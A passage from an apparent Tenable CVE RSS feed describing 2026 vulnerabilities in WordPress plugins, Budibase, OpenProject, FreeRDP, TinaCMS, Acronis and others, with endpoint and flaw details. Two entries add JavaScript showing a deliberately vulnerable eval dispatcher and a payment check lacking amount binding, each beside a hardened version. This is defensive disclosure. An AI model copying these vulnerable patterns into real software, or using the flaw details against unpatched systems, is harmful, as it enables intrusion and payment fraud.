            <pubDate>Fri, 13 Mar 2026 19:55:10 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>The Appointment Booking Calendar — Simply Schedule Appointments plugin for WordPress is vulnerable to unauthorized access of sensitive data in all versions up to and including 1.6.9.29. This is due to two compounding weaknesses: (1) a non-user-bound `public_nonce` is exposed to unauthenticated users through the public `/wp-json/ssa/v1/embed-inner` REST endpoint, and (2) the `get_item()` method in `SSA_Settings_Api` relies on `nonce_permissions_check()` for authorization (which accepts the public nonce) but does not call `remove_unauthorized_settings_for_current_user()` to filter restricted fields. This makes it possible for unauthenticated attackers to access admin-only plugin settings including the administrator email, phone number, internal access tokens, notification configurations, and developer settings via the `/wp-json/ssa/v1/settings/{section}` endpoint. The exposure of appointment tokens also allows an attacker to modify or cancel appointments.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-3045">https://www.tenable.com/cve/CVE-2026-3045</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30240]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30240</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30240</guid>
            <pubDate>Mon, 09 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.31.5 and earlier, a path traversal vulnerability in the PWA (Progressive Web App) ZIP processing endpoint (POST /api/pwa/process-zip) allows an authenticated user with builder privileges to read arbitrary files from the server filesystem, including /proc/1/environ which contains all environment variables — JWT secrets, database credentials, encryption keys, and API tokens. The server reads attacker-specified files via unsanitized path.join() with user-controlled input from icons.json inside the uploaded ZIP, then uploads the file contents to the object store (MinIO/S3) where they can be retrieved through signed URLs. This results in complete platform compromise as all cryptographic secrets and service credentials are exfiltrated in a single request.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30240">https://www.tenable.com/cve/CVE-2026-30240</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30239]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30239</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30239</guid>
            <pubDate>Wed, 11 Mar 2026 17:16:57 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>OpenProject is an open-source, web-based project management software. Prior to 17.2.0, when budgets are deleted, the work packages that were assigned to this budget need to be moved to a different budget. This action was performed before the permission check on the delete action was executed. This allowed all users in the application to delete work package budget assignments. This vulnerability is fixed in 17.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30239">https://www.tenable.com/cve/CVE-2026-30239</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30236]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30236</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30236</guid>
            <pubDate>Wed, 11 Mar 2026 17:16:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenProject is an open-source, web-based project management software. Prior to 17.2.0, when editing a project budget and planning the labor cost, it was not checked that the user planned in the budget was actually a project member. This exposed the user's default rate (if one was set up) to users who should only see that information for project members. The endpoint that handles the pre-calculation for the frontend, used to display a preview of the costs while they are being entered, also did not properly validate the membership of the user, so costs could be calculated with the default rate of non-members as well. This vulnerability is fixed in 17.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30236">https://www.tenable.com/cve/CVE-2026-30236</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30235]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30235</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30235</guid>
            <pubDate>Wed, 11 Mar 2026 17:16:57 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenProject is an open-source, web-based project management software. Prior to 17.2.0, improper validation in OpenProject's Markdown rendering, specifically in its hyperlink handling, allows an attacker to inject malicious hyperlink payloads that perform DOM clobbering. DOM clobbering can crash or blank the entire page by shadowing native DOM functions with named HTML elements, causing critical JavaScript calls to throw runtime errors during application initialization and halt further execution. This vulnerability is fixed in 17.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30235">https://www.tenable.com/cve/CVE-2026-30235</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-30140]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-30140</link>
            <guid>https://www.tenable.com/cve/CVE-2026-30140</guid>
            <pubDate>Mon, 09 Mar 2026 19:16:07 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>An incorrect access control vulnerability exists in Tenda W15E V02.03.01.26_cn. An unauthenticated attacker can access the /cgi-bin/DownloadCfg/RouterCfm.jpg endpoint to download the configuration file containing plaintext administrator credentials, leading to sensitive information disclosure and potential remote administrative access.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-30140">https://www.tenable.com/cve/CVE-2026-30140</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29790]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29790</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29790</guid>
            <pubDate>Fri, 06 Mar 2026 21:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>dbt-common is the shared common utilities for dbt-core and adapter implementations use. Prior to versions 1.34.2 and 1.37.3, a path traversal vulnerability exists in dbt-common's safe_extract() function used when extracting tarball archives. The function uses os.path.commonprefix() to validate that extracted files remain within the intended destination directory. However, commonprefix() compares paths character-by-character rather than by path components, allowing a malicious tarball to write files to sibling directories with matching name prefixes. This issue has been patched in versions 1.34.2 and 1.37.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29790">https://www.tenable.com/cve/CVE-2026-29790</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29789]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29789</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29789</guid>
            <pubDate>Fri, 06 Mar 2026 21:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Vito is a self-hosted web application that helps manage servers and deploy PHP applications into production servers. Prior to version 3.20.3, a missing authorization check in workflow site-creation actions allows an authenticated attacker with workflow write access in one project to create/manage sites on servers belonging to other projects by supplying a foreign server_id. This issue has been patched in version 3.20.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29789">https://www.tenable.com/cve/CVE-2026-29789</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29776]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29776</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29776</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:33 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, an integer underflow exists in the update_read_cache_bitmap_order function of FreeRDP's core library. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29776">https://www.tenable.com/cve/CVE-2026-29776</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29775]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29775</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29775</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:33 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a client-side heap out-of-bounds read/write occurs in FreeRDP's bitmap cache subsystem due to an off-by-one boundary check in bitmap_cache_put. A malicious server can send a CACHE_BITMAP_ORDER (Rev1) with cacheId equal to maxCells, bypassing the guard and accessing cells[] one element past the allocated array. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29775">https://www.tenable.com/cve/CVE-2026-29775</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29774]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29774</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29774</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:32 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, a client-side heap buffer overflow occurs in the FreeRDP client's AVC420/AVC444 YUV-to-RGB conversion path due to missing horizontal bounds validation of H.264 metablock regionRects coordinates. In yuv.c, the clamp() function (line 347) only validates top/bottom against the surface/YUV height, but never checks left/right against the surface width. When avc420_yuv_to_rgb (line 67) computes destination and source pointers using rect->left, it performs unchecked pointer arithmetic that can reach far beyond the allocated surface buffer. A malicious server sends a WIRE_TO_SURFACE_PDU_1 with AVC420 codec containing a regionRects entry where left greatly exceeds the surface width (e.g., left=60000 on a 128px surface). The H.264 bitstream decodes successfully, then yuv420_process_work_callback calls avc420_yuv_to_rgb which computes pDstPoint = pDstData + rect->top * nDstStep + rect->left * 4, writing 16-byte SSE vectors 1888+ bytes past the allocated heap region. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29774">https://www.tenable.com/cve/CVE-2026-29774</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29110]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29110</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29110</guid>
            <pubDate>Fri, 06 Mar 2026 18:16:20 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Cryptomator encrypts data being stored on cloud infrastructure. Prior to version 1.19.0, in non-debug mode Cryptomator might leak cleartext paths into the log file. This can reveal metadata about the files stored inside a vault at a time when the vault itself is closed. Not every cleartext path is logged: a log message is created only when a filesystem request fails for some reason (e.g. a damaged encrypted file or a non-existent file). This issue has been patched in version 1.19.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29110">https://www.tenable.com/cve/CVE-2026-29110</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29091]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29091</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29091</guid>
            <pubDate>Fri, 06 Mar 2026 18:16:20 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Prior to version 3.0.0, a remote code execution (RCE) flaw was discovered in the locutus project, specifically within the call_user_func_array function implementation. The vulnerability allows an attacker to inject arbitrary JavaScript code into the application's runtime environment. This issue stems from an insecure implementation of the call_user_func_array function (and its wrapper call_user_func), which fails to properly validate all components of a callback array before passing them to eval(). This issue has been patched in version 3.0.0.</p>
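      <p>The failure mode described above, as an added example that is not the locutus project's code: a model of a call_user_func_array-style dispatcher that assembles a source string from the callback array and hands it to eval(), beside a dispatcher that resolves the target by property lookup against an explicit scope object and never evaluates text. The exact string locutus built is not given in the advisory, so the vulnerable form here is an assumption about the shape of the flaw; the scope object and the sample callbacks are constructed.</p>

```javascript
// Added example (not locutus code): why a callback array must be resolved by
// lookup rather than by building a source string for eval().

// Vulnerable model: ['Math', 'max'] becomes the source text "Math.max", which
// is evaluated and then called. The method name is never validated, so a
// value such as "min; globalThis.pwned = true; Math.max" is evaluated as
// three statements and still yields a callable function at the end.
function callUserFuncArrayVulnerable(cb, args) {
  if (typeof cb === 'function') return cb(...args);
  if (Array.isArray(cb)) return eval(`${cb[0]}.${cb[1]}`)(...args);
  return eval(String(cb))(...args);
}

// Constructed scope of callables the dispatcher is allowed to reach.
const SCOPE = {
  Math,
  text: { upper: (s) => s.toUpperCase() },
};

// Hardened: resolve [target, method] by own-property lookup on an explicit
// scope, require the result to be a function, and never touch eval().
function callUserFuncArrayHardened(cb, args, scope) {
  if (typeof cb === 'function') return cb(...args);
  if (!Array.isArray(cb) || cb.length !== 2) {
    throw new TypeError('callback must be a function or a [target, method] pair');
  }
  const [target, name] = cb;
  let obj = target;
  if (typeof target === 'string') {
    // Own-property check keeps "__proto__" and other inherited names out.
    if (!Object.prototype.hasOwnProperty.call(scope, target)) {
      throw new TypeError(`unknown callback target: ${target}`);
    }
    obj = scope[target];
  }
  if (obj === null || obj === undefined || typeof name !== 'string') {
    throw new TypeError('invalid callback target');
  }
  if (!Object.prototype.hasOwnProperty.call(obj, name) || typeof obj[name] !== 'function') {
    throw new TypeError(`no such method: ${name}`);
  }
  return obj[name](...args);
}
```

      <p>The injected method name reaches the vulnerable dispatcher as data and leaves it as executed statements; the hardened dispatcher treats the same string as a property name, finds no such own property, and throws without running anything.</p>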

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29091">https://www.tenable.com/cve/CVE-2026-29091</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29079]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29079</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29079</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Lexbor is a web browser engine library. Prior to 2.7.0, a type‑confusion vulnerability exists in Lexbor’s HTML fragment parser. When ns = UNDEF, a comment is created using the “unknown element” constructor. The comment’s data are written into the element’s fields via an unsafe cast, corrupting the qualified_name field. That corrupted value is later used as a pointer and dereferenced near the zero page. This vulnerability is fixed in 2.7.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29079">https://www.tenable.com/cve/CVE-2026-29079</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29078]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29078</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29078</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Lexbor is a web browser engine library. Prior to 2.7.0, the ISO‑2022‑JP encoder in Lexbor fails to reset the temporary size variable between iterations. The statement ctx->buffer_used -= size with a stale size = 3 causes an integer underflow that wraps to SIZE_MAX. Afterwards, memcpy is called with that wrapped (effectively negative) length, leading to an out‑of‑bounds read from the stack and an out‑of‑bounds write to the heap. The source data is partially controllable via the contents of the DOM tree. This vulnerability is fixed in 2.7.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29078">https://www.tenable.com/cve/CVE-2026-29078</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-29066]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-29066</link>
            <guid>https://www.tenable.com/cve/CVE-2026-29066</guid>
            <pubDate>Thu, 12 Mar 2026 17:16:50 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI dev server configures Vite with server.fs.strict: false, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system. This vulnerability is fixed in 2.1.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-29066">https://www.tenable.com/cve/CVE-2026-29066</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2890]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2890</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2890</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>The Formidable Forms plugin for WordPress is vulnerable to a payment integrity bypass in all versions up to, and including, 6.28. This is due to the Stripe Link return handler (`handle_one_time_stripe_link_return_url`) marking payment records as complete based solely on the Stripe PaymentIntent status without comparing the intent's charged amount against the expected payment amount, and the `verify_intent()` function validating only client secret ownership without binding intents to specific forms or actions. This makes it possible for unauthenticated attackers to reuse a PaymentIntent from a completed low-value payment to mark a high-value payment as complete, effectively bypassing payment for goods or services.</p>
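      <p>The check the advisory says is missing, as an added example that is not Formidable Forms code: a model of a return handler that completes a payment record on PaymentIntent status alone, beside one that also binds the intent to the record's amount, currency, form and action. The record and intent shapes are assumed for illustration; in a real integration the intent is fetched server-side by its id from the payment provider, and the form and action identifiers are written into the intent's metadata when the intent is created, not taken from the browser.</p>

```javascript
// Added example (not Formidable Forms code): completing a payment on status
// alone versus binding the intent to the record it is meant to settle.

// Constructed: the pending record created when the high-value form was submitted.
const PAYMENT_RECORD = {
  id: 'pay_9001', formId: 'form_42', actionId: 'act_7',
  amount: 50000, currency: 'usd', status: 'pending',
};

// Constructed: a succeeded intent from an unrelated low-value purchase that an
// attacker replays against the high-value record.
const LOW_VALUE_INTENT = {
  id: 'pi_low', status: 'succeeded', amount: 500, currency: 'usd',
  metadata: { form_id: 'form_1', action_id: 'act_1' },
};

// Constructed: the intent that was actually created for PAYMENT_RECORD.
const MATCHING_INTENT = {
  id: 'pi_ok', status: 'succeeded', amount: 50000, currency: 'usd',
  metadata: { form_id: 'form_42', action_id: 'act_7' },
};

// Vulnerable: the intent's status is the only thing examined.
function completeVulnerable(record, intent) {
  if (intent.status !== 'succeeded') return { ...record };
  return { ...record, status: 'complete', intentId: intent.id };
}

// Hardened: the intent must have succeeded AND be the one created for this
// record. Every mismatch is collected so the caller can log why it failed.
function completeHardened(record, intent) {
  const reasons = [];
  if (intent.status !== 'succeeded') reasons.push('status');
  if (intent.amount !== record.amount) reasons.push('amount');
  if (intent.currency !== record.currency) reasons.push('currency');
  if (intent.metadata?.form_id !== record.formId) reasons.push('form');
  if (intent.metadata?.action_id !== record.actionId) reasons.push('action');
  if (reasons.length > 0) return { ...record, rejected: reasons };
  return { ...record, status: 'complete', intentId: intent.id };
}
```

      <p>Amount and currency alone are not enough: an intent of the right amount from a different form would still pass, which is why the hardened handler also compares the form and action identifiers that were stamped into the intent at creation time.</p>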

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2890">https://www.tenable.com/cve/CVE-2026-2890</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2888]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2888</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2888</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2888">https://www.tenable.com/cve/CVE-2026-2888</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28793]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28793</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28793</guid>
            <pubDate>Thu, 12 Mar 2026 17:16:50 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory. When running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as /media/list/*, /media/upload/*, and /media/*. These endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory. This vulnerability is fixed in 2.1.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28793">https://www.tenable.com/cve/CVE-2026-28793</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28792]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28792</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28792</guid>
            <pubDate>Thu, 12 Mar 2026 17:16:50 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developers' machines simply by tricking them into visiting a malicious website while tinacms dev is running. This vulnerability is fixed in 2.1.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28792">https://www.tenable.com/cve/CVE-2026-28792</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28791]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28791</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28791</guid>
            <pubDate>Thu, 12 Mar 2026 17:16:50 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Tina is a headless content management system. Prior to 2.1.7, a path traversal vulnerability exists in the TinaCMS development server's media upload handler. The code at media.ts joins user-controlled path segments using path.join() without validating that the resulting path stays within the intended media directory. This allows writing files to arbitrary locations on the filesystem. This vulnerability is fixed in 2.1.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28791">https://www.tenable.com/cve/CVE-2026-28791</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2879]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2879</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2879</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` parameter in the `create()` method of the `GetGenieChat` REST API endpoint. The method accepts a user-controlled post ID and, when a post with that ID exists, calls `wp_update_post()` without verifying that the current user owns the post or that the post is of the expected `getgenie_chat` type. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite arbitrary posts owned by any user — including Administrators — effectively destroying the original content by changing its `post_type` to `getgenie_chat` and reassigning `post_author` to the attacker.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2879">https://www.tenable.com/cve/CVE-2026-2879</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28727]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28727</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28727</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Local privilege escalation due to insecure Unix socket permissions. The following products are affected: Acronis Cyber Protect 17 (macOS) before build 41186, Acronis Cyber Protect Cloud Agent (macOS) before build 41124.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28727">https://www.tenable.com/cve/CVE-2026-28727</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28726]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28726</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28726</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Sensitive information disclosure due to improper access control. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28726">https://www.tenable.com/cve/CVE-2026-28726</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28725]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28725</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28725</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Sensitive information disclosure due to improper configuration of a headless browser. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28725">https://www.tenable.com/cve/CVE-2026-28725</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28724]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28724</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28724</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unauthorized data access due to insufficient access control validation. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28724">https://www.tenable.com/cve/CVE-2026-28724</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28723]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28723</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28723</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:13 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unauthorized report deletion due to insufficient access control. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28723">https://www.tenable.com/cve/CVE-2026-28723</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28720]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28720</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28720</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:12 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unauthorized modification of settings due to insufficient authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28720">https://www.tenable.com/cve/CVE-2026-28720</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28719]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28719</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28719</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:12 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unauthorized resource manipulation due to improper authorization checks. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28719">https://www.tenable.com/cve/CVE-2026-28719</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28714]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28714</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28714</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:11 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Unnecessary transmission of sensitive cryptographic material. The following products are affected: Acronis Cyber Protect 17 (Linux, Windows) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28714">https://www.tenable.com/cve/CVE-2026-28714</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28713]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28713</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28713</guid>
            <pubDate>Fri, 06 Mar 2026 00:16:11 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Default credentials set for local privileged user in Virtual Appliance. The following products are affected: Acronis Cyber Protect Cloud Agent (VMware) before build 36943, Acronis Cyber Protect 17 (VMware) before build 41186.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28713">https://www.tenable.com/cve/CVE-2026-28713</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2859]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2859</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2859</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:34 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper permission enforcement in Checkmk versions 2.4.0 before 2.4.0p23, 2.3.0 before 2.3.0p43, and 2.2.0 (EOL) allows unauthenticated users to enumerate existing hosts by observing different HTTP response codes from the deploy_agent endpoint, which could lead to information disclosure.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2859">https://www.tenable.com/cve/CVE-2026-2859</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28513]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28513</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28513</guid>
            <pubDate>Tue, 10 Mar 2026 17:38:50 GMT</pubDate>
            <description><![CDATA[
